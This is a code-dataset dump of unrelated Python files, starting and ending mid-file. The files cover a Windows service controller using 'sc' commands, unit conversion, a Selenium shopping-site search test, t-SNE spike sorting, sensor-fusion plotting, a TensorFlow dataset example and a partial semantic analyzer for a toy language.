result:\n return 'uninstalled'\n except Exception:\n logging.info(traceback.format_exc())\n\n def service_state_operate(self, service_name, state):\n\n '''\n start or stop an installed service with a cmd command\n :param service_name: service's name\n :param state: start or stop, used to control function start or stop the service\n :return: service start or stop result\n '''\n\n try:\n result = os.popen('sc ' + state + ' ' + service_name).read()\n\n if '1058' in result:\n return 'error'\n elif '1060' in result:\n return 'uninstalled'\n elif '1056' in result:\n return 'active'\n elif '1062' in result:\n return 'inactive'\n elif 'START_PENDING' in result or 'STOP_PENDING' in result:\n return 'success'\n except Exception:\n logging.info(traceback.format_exc())\n\n def restart_service(self, service_name):\n\n '''\n restart an installed service with a cmd command\n :param service_name: service's name\n :return: service restart result\n '''\n\n try:\n result_stop = self.stop_service(service_name)\n time.sleep(1)\n try:\n result_start = self.start_service(service_name)\n except Exception:\n logging.info(traceback.format_exc())\n\n if (result_stop == 'success' and result_start == 'success') or (\n result_stop == 'inactive' and result_start == 'success'):\n return 'success'\n elif result_stop == 'uninstalled' or result_start == 'uninstalled':\n return 'uninstalled'\n elif result_stop == 'error' or result_start == 'error':\n return 'error'\n except Exception:\n logging.info(traceback.format_exc())\n\n def auto_start_service(self, service_name, state):\n\n '''\n set the service start auto or demand, or disable the service\n :param service_name: service's name\n :param state: service start state, auto or demand or disable\n :return: Null\n '''\n\n try:\n os.popen('sc config ' + service_name + 'state= ' + state)\n return None\n except Exception:\n logging.info(traceback.format_exc())\n\n def delete_service(self, service_name):\n\n '''\n delete an installed service with a cmd command\n :param service_name: service's name\n :return: delete result\n '''\n\n try:\n result_stop = self.stop_service(service_name)\n time.sleep(1)\n try:\n result_delete = os.popen('sc delete ' + service_name).read()\n except Exception:\n logging.info(traceback.format_exc())\n\n if (result_stop == 'success' and '成功' in result_delete) or (\n result_stop == 'inactive' and '成功' in result_delete):\n return 'success'\n elif result_stop == 'uninstalled':\n return 'success'\n elif result_stop == 'error' and '成功' not in result_delete:\n return 'error'\n except Exception:\n logging.info(traceback.format_exc())\n\n def open_log(self, service_log):\n\n '''\n open log file of the service with a cmd command\n :param service_log: service's log address\n :return: Null\n '''\n\n try:\n os.system('notepad ' + service_log)\n return None\n except Exception:\n logging.info(traceback.format_exc())\n\n # wait to rewrite\n def open_file(self, log_file_address):\n\n '''\n open log folder of the service with a cmd command\n :param log_file_address: address of the log file folder\n :return: Null\n '''\n\n try:\n os.popen('start ' + os.path.abspath(log_file_address))\n return None\n except Exception:\n logging.info(traceback.format_exc())\n\n def open_setup(self, service_name, service_setup):\n\n '''\n add service into registry and service list\n :param service_name: service's name\n :param service_setup: address of setup file\n :return: Null\n '''\n\n try:\n os.popen('sc create ' + service_name + ' binPath= ' + service_setup)\n return None\n except Exception:\n logging.info(traceback.format_exc())\n","sub_path":"system_service.py","file_name":"system_service.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"517950153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nStorage Format Conversion Class\n\"\"\"\n\nimport math\nimport re\n\n__author__ = \"Sean Douglas\"\n__version__ = \"0.1.0\"\n__license__ = \"MIT\"\n\n\nclass UnitConversion:\n \"\"\"\n Class to convert between byte and human readable storage formats\n \"\"\"\n units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']\n\n def __init__(self, binary: bool=True):\n self.nn = 1024 if binary else 1000\n\n @staticmethod\n def _separate(val: str) -> tuple:\n \"\"\"\n Extract a float and unit type from a string\n :param val: str\n :return: tuple([float, str])\n \"\"\"\n if not val:\n return tuple([0.00, 'b'])\n elif not len(val.split()) > 1:\n _ = re.search('([\\d.]+)(.*)', val)\n if _:\n m = _.groups()\n return tuple([float(m[0]), m[1] if m[1] else 'b'])\n else:\n s = val.split()\n return tuple([float(s[0]), s[1]])\n\n def _convert_bytes(self, x_bytes: int) -> tuple:\n \"\"\"\n Converts bytes to a tuple that is easier to read\n :param x_bytes: int\n :return: tuple([float, str])\n \"\"\"\n if x_bytes:\n u = int(math.floor(math.log(x_bytes) / math.log(self.nn)))\n return tuple([x_bytes / math.pow(self.nn, u), self.units[u].lower()])\n else:\n return tuple([None, None])\n\n def _convert_string(self, value: float, unit: str) -> int:\n \"\"\"\n Convert a tuple containing a human readable string representation to bytes\n :param value: float\n :param unit: str\n :return: int\n \"\"\"\n try:\n x = self.units.index(unit.upper())\n return int(value * math.pow(self.nn, x))\n except ValueError as v:\n print('Unit not supported, {}: {}'.format(v.args[-1], ', '.join(self.units)))\n\n @classmethod\n def bytes_to_str(cls, x_bytes: int, binary: bool=True, precision: int=2) -> str:\n \"\"\"\n Convert bytes integer to a human readable string.\n :param x_bytes: int\n :param binary: bool, True uses decimal representation (1024) False used base 10 (1000)\n :param precision: int, decimal precision\n :return: str\n \"\"\"\n res = cls(binary)._convert_bytes(x_bytes)\n return '{}{}'.format(round(res[0], precision), res[1])\n\n @classmethod\n def str_to_bytes(cls, value: str, binary: bool=True) -> int:\n \"\"\"\n Convert human readable string into an bytes integer\n :param value: str\n :param binary: bool, True uses decimal representation (1024) False used base 10 (1000)\n :return: int\n \"\"\"\n s = cls._separate(value)\n return cls(binary)._convert_string(s[0], s[1])\n","sub_path":"common_utils/unit_conversion.py","file_name":"unit_conversion.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"354319445","text":"'''\nCreated on 27-Aug-2019\n\n@author: kapilmehta\nSearch Flipkart without loggin in\n'''\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nimport unittest\nfrom selenium.common.exceptions import StaleElementReferenceException\n\n\ndriver = webdriver.Chrome(\"/Users/kapilmehta/Downloads/chromedriver\")\ndriver.maximize_window()\n\n'Opening website, verifying the title and searching'\ndriver.get('https://www.flipkart.com/')\n\nelement = driver.title\nprint(element)\nassert element == \"Online Shopping Site for Mobiles, Electronics, Furniture, Grocery, Lifestyle, Books & More. Best Offers!\"\n\nWebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, \"//span[text()='Login']\")))\n\ndriver.find_element_by_xpath(\"//button[contains(text(), '✕')]\").click()\nWebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, \"//*[contains(.,'Login & Signup')]\")))\n\ndriver.find_element_by_name(\"q\").send_keys(\"istqb\")\n\ntime.sleep(2)\nallbook = driver.find_elements_by_xpath(\".//form[@class='_1WMLwI header-form-search']//ul//li\")\nfor item in allbook :\n print(item.text)\n\nfor item in allbook :\n try:\n if item.text == \"foundation of software testing istqb certification - istqb certification\":\n time.sleep(1)\n #driver.find_element_by_xpath(\".//form[@class='_1WMLwI header-form-search']//ul//li[contains(text(), 'foundation of software testing istqb certification - istqb certification'])\").click()\n driver.find_element_by_xpath(\"//a[contains(@href, 'foundation')]\").click()\n except StaleElementReferenceException as exception:\n pass \nif __name__ == \"__main__\":\n unittest.main()\n\ntime.sleep(5)\ndriver.quit()","sub_path":"FlipkartSearch.py","file_name":"FlipkartSearch.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"227930731","text":"# M. P. Hayes UCECE\nimport numpy as np\nfrom ipywidgets import interact, interactive, fixed\nfrom .lib.signal_plot import signal_overplot3\nfrom .lib.utils import gauss, rect, trap2\n\ndef BLUE_demo4_plot(muX1=2, muX2=2, sigmaX1=1.0, sigmaX2=2.0, w1=0.5):\n\n w2 = 1.0 - w1\n \n WX1 = sigmaX1 * np.sqrt(12)\n WX2 = sigmaX2 * np.sqrt(12)\n\n muX = w1 * muX1 + w2 * muX2\n sigmaX = np.sqrt(w1**2 * sigmaX1**2 + w2**2 * sigmaX2**2) \n WX = w1 * WX1 + w2 * WX2\n TX = abs(w1 * WX1 - w2 * WX2)\n \n N = 401\n x = np.linspace(-8, 8, N)\n \n fX1 = rect((x - muX1) / WX1) / WX1\n fX2 = rect((x - muX2) / WX2) / WX2\n fX = trap2(x - muX, TX, WX) * (2 / (TX + WX))\n\n fig = signal_overplot3(x, fX1, x, fX2, x, fX, ('$f_{\\hat{X}_1}(x)$', '$f_{\\hat{X}_2}(x)$', '$f_{\\hat{X}}(x)$'), ylim=(0, 0.5))\n fig.axes[0].set_xlabel('$x$')\n fig.axes[0].grid(True) \n\ndef BLUE_demo4():\n interact(BLUE_demo4_plot,\n sigmaX1=(0.5, 4.0, 0.1),\n sigmaX2=(0.5, 4.0, 0.1),\n w1=(0, 1.0, 0.05))\n \n \n\n \n\n","sub_path":"sensor-fusion/demos/BLUE_demo4.py","file_name":"BLUE_demo4.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329902023","text":"\nimport pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ndef min_dict(freq):\n\n \"\"\"\n 将分钟索引标准化\n :param freq: 分钟频率\n :return: 标准化的分钟序列字典\n\n \"\"\"\n day = '2016-02-01'\n df_1min=pd.DataFrame({'time':list(pd.date_range(day+' 09:30:00',day+' 11:30:00',freq='1min'))+list(pd.date_range(day+' 13:00:00',day+' 15:00:00',freq='1min'))})\n df_1min.time=df_1min.time.apply(lambda x:int(x.strftime('%H%M')))\n\n df=pd.DataFrame({'time_ls':list(pd.date_range(day+' 09:30:00',day+' 11:30:00',freq=freq))+list(pd.date_range(day+' 13:00:00',day+' 15:00:00',freq=freq))})\n df.time_ls=df.time_ls.apply(lambda x:int(x.strftime('%H%M')))\n\n df=df.merge(df_1min,left_on='time_ls',right_on='time',how='outer')\n df=df.sort_values('time')\n df.time_ls=df.time_ls.fillna(method='bfill')\n df=df.astype(int)\n df['i']=1\n df={x:v[1] for x,v in df.pivot(index='i',columns='time',values='time_ls').items()}\n\n return df\n\n\nif __name__=='__main__':\n\n freq='10min'\n dd=min_dict(freq)\n\n","sub_path":"myFuncs.py","file_name":"myFuncs.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"378010544","text":"import logging\nimport os\nimport sys\nimport auxiliary_module as aux\n\nfile_dir = os.path.dirname(\"auxiliary _module.py\")\nsys.path.append(file_dir)\n\n\n# sys.path.append(\"scripting/auxiliary _module.py\")\n\n# create logger with 'spam_application'\nlogger = logging.getLogger('spam_application')\nlogger.setLevel(logging.DEBUG)\n\n# create a file handler which logs even debug messages (FILE HANDLER)\nfh = logging.FileHandler('spam.log')\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level (CONSOLE HANDLER)\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n\n# create formatter and add it to the handler\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n\n# add the handlers to the logger\n# comment out\n# logger.addHandler(fh)\n# logger.addHandler(ch)\n#\n# logger.info('creating an instance of auxiliary_module.Auxiliary')\n# a = aux.Auxiliary()\n# logger.info('created an instance of auxiliary_module.Auxiliary')\n#\n# logger.info('calling auxiliary_module.Auxiliary.do_something')\n# a.do_something()\n# logger.info('finished auxiliary_module.Auxiliary.do_something')\n#\n# logger.info('calling auxiliary_module.some_function()')\n# aux.some_function()\n# logger.info('done with auxiliary_module.some_function()')\n\n# remove test_time & test_scenarios\n","sub_path":"logging_demo.py","file_name":"logging_demo.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"139930584","text":"from typing import List, Optional\n\nfrom ..common.models import GameEvent\n\n\nclass GameFlow:\n def __init__(self):\n self.events: Optional[List[GameEvent]] = list()\n self.time: Optional[float] = 0.0\n\n async def update(self, events_data, game_data):\n self.events = [GameEvent(**event) for event in events_data]\n self.time = game_data.get(\"gameTime\") or 0.0\n","sub_path":"leaguepybotv2/game_watcher/game_flow.py","file_name":"game_flow.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246699579","text":"import sys\nimport time\n\nimport matplotlib.pylab as pylab\nimport numpy as np\n\nfrom tsne_for_spikesort import gpu\nfrom tsne_for_spikesort import sptree_jit as sptree\n\n# import tsne_for_spikesort.spikesorttsne as sptsne\nimport tsne_for_spikesort.io_with_cpp as io\n\nfrom subprocess import Popen, PIPE\n\nfrom os import replace\nfrom os.path import join as path_join\nimport sys\n\n\ndef run(data, indices_of_first_and_second_matrices, intermediate_file_dir, iters, perplexity, eta=200, num_dims=2,\n theta=0.2, verbose=True, exe_dir=None):\n\n # zero mean input data\n data = pylab.demean(data, axis=0)\n\n # normalize input data\n data /= data.max()\n\n\n\n num_samples = data.shape[0]\n\n\n # find distances in hd space and sort\n s1 = time.time()\n closest_indices_in_hd, closest_distances_in_hd = \\\n gpu.calculate_knn_distances_close_on_probe(template_features_sorted=data,\n indices_of_first_and_second_matrices=\n indices_of_first_and_second_matrices,\n perplexity=perplexity,\n verbose=verbose)\n e1 = time.time()\n if verbose > 1:\n print('Time for Knn distance calculation: ' + str(e1 - s1))\n\n # compute_gaussian_perplexity\n indices_p, values_p = _compute_gaussian_perplexity(closest_indices_in_hd, closest_distances_in_hd,\n perplexity=perplexity)\n\n # renormalize\n sum_p = np.sum(values_p)\n values_p /= sum_p\n\n\n indices_p = indices_p.astype(np.uint)\n values_p = values_p.astype(np.float64)\n\n num_knns = indices_p.shape[1]\n\n # initialize solution\n y = np.random.random((num_samples, num_dims)) * 0.0001\n y = np.array(y, dtype=np.float64)\n\n s2 = time.time()\n\n #y = run_iterations_with_python(iters, indices_p, values_p, eta, verbose)\n\n #y = run_iterations_with_cython(y, num_samples, num_dims, indices_p, values_p, num_knns, perplexity,\n # theta, eta, iters, verbose)\n\n y =run_iterations_with_cpp_exe(intermediate_file_dir, y, indices_p, values_p, num_knns, theta, perplexity, eta, iters,\n verbose, exe_dir=exe_dir)\n\n e2 = time.time()\n if verbose > 1:\n print('Time for calculating the t-sne data: ' + str(e2 - s2))\n if verbose > 1:\n print('Time for total calculation: ' + str(e2 - s1))\n\n return y\n\n\ndef _compute_gaussian_perplexity(selected_sorted_indices, selected_sorted_distances,\n perplexity=100):\n k = selected_sorted_indices.shape[1]\n n = selected_sorted_indices.shape[0]\n dbl_min = sys.float_info[3]\n dbl_max = sys.float_info[0]\n\n ind_p = selected_sorted_indices.astype(np.int)\n val_p = np.empty((n, k))\n for spike in np.arange(n):\n beta = 1.0\n found = False\n min_beta = -dbl_max\n max_beta = dbl_max\n tolerance = 1e-5\n\n iter = 0\n sum_p = 0\n while not found and iter < 200:\n cur_distances = selected_sorted_distances[spike, :]\n cur_p = np.exp(-beta * cur_distances)\n sum_p = dbl_min + np.sum(cur_p)\n H = np.sum(beta * cur_distances * cur_p) / sum_p + np.log(sum_p)\n\n H_diff = H - np.log(perplexity)\n if H_diff < tolerance and -H_diff < tolerance:\n found = True\n else:\n if H_diff > 0:\n min_beta = beta\n if max_beta == dbl_max or max_beta == -dbl_max:\n beta *= 2.0\n else:\n beta = (beta + max_beta) / 2.0\n else:\n max_beta = beta\n if min_beta == -dbl_max or min_beta == dbl_max:\n beta /= 2.0\n else:\n beta = (beta + min_beta) / 2.0\n iter += 1\n\n cur_p /= sum_p\n\n val_p[spike, :] = cur_p\n\n return ind_p, val_p\n\n\ndef _compute_gradient_on_cpu_with_sptree(t_sne, indices_p, values_p, theta):\n\n dimension = t_sne.shape[1]\n num_of_points = t_sne.shape[0]\n neg_forces = np.zeros((num_of_points, dimension))\n sum_q = [0.0]\n\n tree = sptree.SPTree(inp_dimension=dimension, inp_data=t_sne, inp_num_of_points=num_of_points)\n\n pos_forces = tree.compute_edge_forces(indices_p=indices_p, values_p=values_p, N=num_of_points)\n for n in np.arange(num_of_points):\n tree.compute_non_edge_forces(point_index=n, theta=theta, neg_force=neg_forces, sum_q=sum_q)\n\n dy = pos_forces - (neg_forces / sum_q[0])\n\n return dy\n\n\ndef run_iterations_with_python(iters, indices_p, values_p, num_samples, num_dims, eta, verbose):\n\n momentum = 0.5\n final_momentum = 0.8\n exaggeration = 12.0\n stop_lying_iter = 250\n mom_switch_iter = 250\n\n uy = np.zeros((num_samples, num_dims))\n gains = np.ones((num_samples, num_dims))\n\n # run loop\n verbose_gradient = False\n if verbose > 2:\n verbose_gradient = True\n\n # lie about p-values\n values_p *= exaggeration\n\n for it in np.arange(iters):\n # compute_gradient\n dy = gpu.compute_gradient_on_gpu(y, indices_p=indices_p, values_p=values_p, verbose=verbose_gradient)\n # dy = _compute_gradient_on_cpu_with_sptree(y, indices_p=indices_p, values_p=values_p, theta=theta)\n\n # update gains\n gains[np.argwhere(np.sign(dy) != np.sign(uy))] += 0.05\n gains[np.argwhere(np.sign(dy) == np.sign(uy))] *= 0.95\n gains[np.argwhere(gains < 0.01)] = 0.01\n\n # update gradient\n uy = momentum * uy - eta * gains * dy\n y += uy\n\n # zero mean solution\n y = pylab.demean(y, axis=0)\n\n if it == stop_lying_iter:\n values_p /= exaggeration\n if it == mom_switch_iter:\n momentum = final_momentum\n\n # evaluate error and print progress\n if it % 5 == 0 and verbose:\n e3 = time.time()\n print('Time for iteration ' + str(it) + ' = ' + str(e3 - s3))\n s3 = time.time()\n\n return y\n\n'''\ndef run_iterations_with_cython(Y, N, no_dims, col_P, val_P, K, perplexity, theta, eta, iterations, verbose):\n tsne = sptsne.SP_TSNE()\n Y = tsne.run(Y, N, no_dims, col_P, val_P, K, int(perplexity), theta, eta, iterations, verbose)\n\n return Y\n'''\n\ndef run_iterations_with_cpp_exe(files_dir, y, col_p, val_p, k, theta, perplexity, eta, iterations, verbose, exe_dir=None):\n\n io.save_data_for_tsne(files_dir, y, col_p, val_p, k, theta, perplexity, eta, iterations, verbose)\n\n del y\n # Call Barnes_Hut.exe and let it do its thing\n if exe_dir is None:\n exe_dir = io._find_exe_dir()\n with Popen([exe_dir], cwd=files_dir, stdout=PIPE, bufsize=1, universal_newlines=True) \\\n as t_sne_exe:\n for line in iter(t_sne_exe.stdout):\n print(line, end='')\n sys.stdout.flush()\n t_sne_exe.wait()\n assert not t_sne_exe.returncode, ('ERROR: Call to Barnes_Hut exited '\n 'with a non-zero return code exit status, please ' +\n ('enable verbose mode and ' if not verbose else '') +\n 'refer to the t_sne output for further details')\n\n return np.array(io.load_tsne_result(files_dir))\n\n","sub_path":"tsne_for_spikesort/t_sne.py","file_name":"t_sne.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477236302","text":"import tensorflow as tf\n\n# 从一个数组创建数据集\ninput_data = [1, 2, 3, 5, 8]\ndataset = tf.data.Dataset.from_tensor_slices(input_data)\n\n# 定义一个迭代器用于遍历数据集。因为上面定义的数据集没用placeholder。\n# 作为输入参数,所以这里可以使用最简单的one_shot_iterator\niterator = dataset.make_one_shot_iterator()\n# 使用迭代器的get_next()方法代表一个输入数据的张量,类似于队列的dequeue()。\nx = iterator.get_next()\ny = x * x\n\nwith tf.Session() as sess:\n for i in range(len(input_data)):\n print(sess.run(y))\n","sub_path":"tensorflowinputdocument/DatasetBaseOne.py","file_name":"DatasetBaseOne.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"307101251","text":"import re\nimport TablaHash\nimport Funcion\nimport Variable\n\n\nclass AnalizadorSemantico:\n def __init__(self):\n self.tabla = TablaHash.TablaHash()\n self.tokens = ['void','int','float','string']\n \n\n def buscar(self,num):\n return self.tabla.Search(num)\n \n\n def _esFuncion(self,linea):\n y = re.search('\\(',linea)\n if(y): \n return True\n else:\n return False\n\n def crear_tabla(self):\n contador = 0\n cuerpo = \"\"\n booleana = bool(0)\n contador2 = 0\n\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n if self._esFuncion(linea) is True:\n nombre = linea.split(' ')[1].strip() \n contador = contador + 1\n cuerpo = \"\"\n for linea2 in f:\n if linea2 != ' ':\n x = re.search('\\{',linea2)\n y = re.search('\\}',linea2)\n if(x):\n z = re.search(nombre,linea2)\n if (z):\n contador = contador + 1\n contador2 = contador2 + 1\n else:\n if(self._tieneParametros(linea) == True):\n x1 = 3\n while x1 < linea.count(\" \") - 1:\n if linea.split(' ')[x1].strip() != ',':\n tipoV = linea.split(' ')[x1].strip()\n if linea.split(' ')[x1+1].strip() != ',':\n nombreV = linea.split(' ')[x1+1].strip()\n variable = Variable.Variable(tipoV,nombreV,None,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombreV,variable)\n x1 = x1 + 3\n \n cuerpo = cuerpo + linea2\n contador = contador+1\n contador2 = contador2 + 1\n \n for i in range(len(self.tokens)):\n if linea2.split(' ')[0].strip() == self.tokens[i]:\n tipo3 = linea2.split(' ')[0].strip()\n nombre3 = linea2.split(' ')[1].strip()\n if tipo3 == \"int\":\n valor13 = linea2.split('=')[1].strip()\n valor3 = valor13.replace(';','')\n \n variable = Variable.Variable(tipo3,nombre3,valor3,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombre3,variable)\n else:\n if(y):\n contador = contador-1\n if(contador == 0): \n break\n cuerpo = cuerpo + linea2\n contador2 = contador2 + 1\n\n for i in range(len(self.tokens)):\n if linea2.split(' ')[0].strip() == self.tokens[i]:\n tipo3 = linea2.split(' ')[0].strip()\n nombre3 = linea2.split(' ')[1].strip()\n valor13 = linea2.split('=')[1].strip()\n valor3 = valor13.replace(';','')\n \n variable = Variable.Variable(tipo3,nombre3,valor3,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombre3,variable)\n \n else:\n cuerpo = cuerpo + linea2\n contador2 = contador2 + 1\n\n for i in range(len(self.tokens)):\n if linea2.split(' ')[0].strip() == self.tokens[i]:\n tipo3 = linea2.split(' ')[0].strip()\n nombre3 = linea2.split(' ')[1].strip()\n valor13 = linea2.split('=')[1].strip()\n valor3 = valor13.replace(';','')\n \n variable = Variable.Variable(tipo3,nombre3,valor3,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombre3,variable)\n \n \n\n funcion = Funcion.Funcion(linea.split(' ')[0].strip(),nombre,cuerpo,self._numerodelineas(linea2))\n self.tabla.Insert(nombre,funcion)\n\n else:\n if(contador2 == 0):\n if linea.count(\" \") == 2:\n nombre = linea.split(' ')[0].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n\n variable = Variable.Variable(None,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n else:\n tipo = linea.split(' ')[0].strip()\n nombre = linea.split(' ')[1].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n \n variable = Variable.Variable(tipo,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n elif linea.count(\" \") == 3:\n tipo = linea.split(' ')[0].strip()\n nombre = linea.split(' ')[1].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n\n variable = Variable.Variable(tipo,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n elif linea.count(\" \") == 2:\n nombre = linea.split(' ')[0].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n\n variable = Variable.Variable(None,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n\n def _imprimir(self):\n print(self.tabla.Search('cadena').getValor())\n\n def _tieneParametros(self,linea):\n x = re.search('\\(' '\\)',linea)\n\n if(x):\n return False\n return True\n\n def _esInt(self,linea):\n x = re.search('int',linea)\n if(x):\n return True\n else:\n return False\n\n def _cualTipoes(self,tipo):\n if tipo == \"int\":\n return int\n if tipo == \"string\":\n return str\n if tipo == \"float\":\n return float\n\n def _numerodelineas(self,lineaAbuscar):\n contador = 1\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n if linea == lineaAbuscar:\n return contador\n contador = contador +1\n\n def _while_if(self,linea):\n x = re.search('if',linea)\n y = re.search('while',linea)\n\n if x or y:\n return True\n return False\n\n def es_flotante(self,variable):\n try:\n float(variable)\n return True\n except:\n return False\n \n def es_int(self,variable):\n try:\n int(variable)\n return True\n except:\n return False\n\n\n def _imprimirArchivo(self):\n contador = 1\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n print(contador , \" \", linea,end='')\n contador = contador+1\n print()\n\n def _estaenlaTabla(self,variable):\n if self.tabla.Search(variable) != None:\n return True\n return False\n\n def _errorDeCuerpoFunciones(self):\n contador = 0\n contu = 0\n cont = 0\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n cont = 0\n if self._esFuncion(linea) is True and self._while_if(linea) is False:\n nombre = linea.split(' ')[1].strip() \n cuerpo = self.tabla.Search(nombre).getCuerpo()\n \n for i in cuerpo:\n if i == '\\n':\n contador = contador + 1\n\n for linea2 in f:\n if linea2 !=' ':\n tipo = self.tabla.Search(nombre).getTipo()\n x = re.search('return',cuerpo)\n\n if(x and tipo == \"void\" and cont == 0):\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" 'return' no valido en funciones void\")\n cont = cont+1\n \n if linea2.split(' ')[0].strip() == \"return\":\n nombreV1 = linea2.split(' ')[1].strip()\n nombreV = nombreV1.replace(';','')\n if self._estaenlaTabla(nombreV) == True:\n tipoV = self.tabla.Search(nombreV).getTipo()\n \n if tipoV == None:\n print(\"Error en linea:\" , self._numerodelineas(linea2) + contador ,\"La variable \", \"'\",self.tabla.Search(nombreV).getNombre(),\"'\", \" No esta declarada\")\n\n elif tipoV != tipo:\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor de retorno no coincide con el tipo de funcion\")\n else:\n if self.es_int(nombreV) == False and self.es_flotante(nombreV) == False:\n if tipo != \"string\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor de retorno no coincide con el tipo de funcion\")\n\n if self.es_int(nombreV) == True or self.es_flotante(nombreV) == True:\n if tipo != \"int\" and \"float\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor de retorno no coincide con el tipo de funcion\")\n\n if linea2.count(\" \") == 2:\n conta = 0\n nombreV2 = linea2.split(' ')[0].strip()\n valor12 = linea2.split('=')[1].strip()\n valor2 = valor12.replace(';','')\n\n \n if self.es_int(valor2) == True and conta == 0:\n if self.tabla.Search(nombreV2).getTipo() != \"int\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor del tipo de variable\",\"'\",self.tabla.Search(nombreV2).getNombre(),\"'\",\"no coincide\")\n conta = conta+1\n \n if self.es_flotante(valor2) == True and self.tabla.Search(nombreV2).getAlcance() == \"local\" and conta == 0:\n if self.tabla.Search(nombreV2).getTipo() != \"float\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor del tipo de variable\",\"'\",self.tabla.Search(nombreV2).getNombre(),\"'\",\"no coincide\")\n conta = conta + 1\n\n if self.es_flotante(valor2) == False and self.es_int(valor2) == False:\n if self.tabla.Search(nombreV2).getTipo() != \"string\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor del tipo de variable\",\"'\",self.tabla.Search(nombreV2).getNombre(),\"'\",\"no coincide\")\n conta = 0 \n\n nombreParametro = \"\"\n if self._while_if(linea2) is True:\n nombreParametro = linea2.split(' ')[2].strip() \n if self.tabla.Search(nombreParametro) == None:\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" La variable \",\"'\", nombreParametro,\"'\", \" no esta declarada\")\n contu = contu + 1\n if contu == contador:\n break\n\n def _errorAsignacion(self):\n contador = 0\n contador2 = 0\n\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n if self._esFuncion(linea) is True and self._while_if(linea) is False:\n nombre = linea.split(' ')[1].strip() \n for i in range(len(self.tokens)):\n if self.tabla.Search(nombre).getTipo() != self.tokens[i]:\n contador = contador + 1\n if contador == 4: \n print(\"Error en linea:\" , self._numerodelineas(linea) , \" Tipo de dato: \" + self.tabla.Search(nombre).getTipo() + \" no valido\")\n contador = 0 \n else:\n if linea.count(\" \") == 3:\n nombre = linea.split(' ')[1].strip()\n for i in range(len(self.tokens)):\n if self.tabla.Search(nombre).getTipo() != self.tokens[i]:\n contador = contador + 1\n if contador == 4: \n if self.tabla.Search(nombre).getTipo() != None:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" Tipo de dato: \" , self.tabla.Search(nombre).getTipo() , \" no valido\")\n if self.tabla.Search(nombre).getTipo() == None:\n print(\"Error en linea:\" , self._numerodelineas(linea) ,\"La variable \" ,\"'\",self.tabla.Search(nombre).getNombre(),\"'\",self.tabla.Search(nombre).getNombre(), \" No esta declarada\")\n contador = 0\n\n if self.tabla.Search(nombre).getValor().isdigit() == True:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != int and self._cualTipoes(self.tabla.Search(nombre).getTipo()) != float:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n\n if self.tabla.Search(nombre).getValor().isdigit() != True and self.es_flotante(self.tabla.Search(nombre).getValor()) is False:\n if self._estaenlaTabla(self.tabla.Search(nombre).getValor()) == True:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != str and self.tabla.Search(self.tabla.Search(nombre).getValor()).getTipo() != self.tabla.Search(nombre).getTipo():\n print(\"Error en linea:\" , 